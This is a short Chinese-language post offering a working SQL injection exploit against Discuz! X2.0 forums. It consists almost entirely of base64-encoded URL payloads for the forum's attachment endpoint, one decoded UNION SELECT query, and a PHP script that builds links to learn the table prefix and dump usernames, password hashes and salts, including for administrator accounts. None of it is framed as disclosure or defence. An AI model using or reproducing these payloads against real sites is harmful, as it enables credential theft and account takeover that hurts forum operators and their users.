DZ2.0直接暴管理账号密码(默认前缀的情况下)

/forum.php?mod=p_w_upload&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D

base64解码

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where  username like ‘admin|x|y

如果不是默认前缀
暴前缀EXP
/forum.php?mod=p_w_upload&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

 ———————–

再贴个PHP的EXP

<?php

$host=”http://X2.0论坛地址”;

$affuser=”要爆的用户名username”;

echo ‘<a href=”‘;

echo $host.”forum.php?mod=p_w_upload&findpost=ss&aid=”;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));

echo ‘” target=”_blank”>爆前缀</a>’;

echo “</br>”;

echo ‘<a href=”‘;

echo $host.”forum.php?mod=p_w_upload&findpost=ss&aid=”;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));

echo ‘” target=”_blank”>爆password,salt</a>’;

?>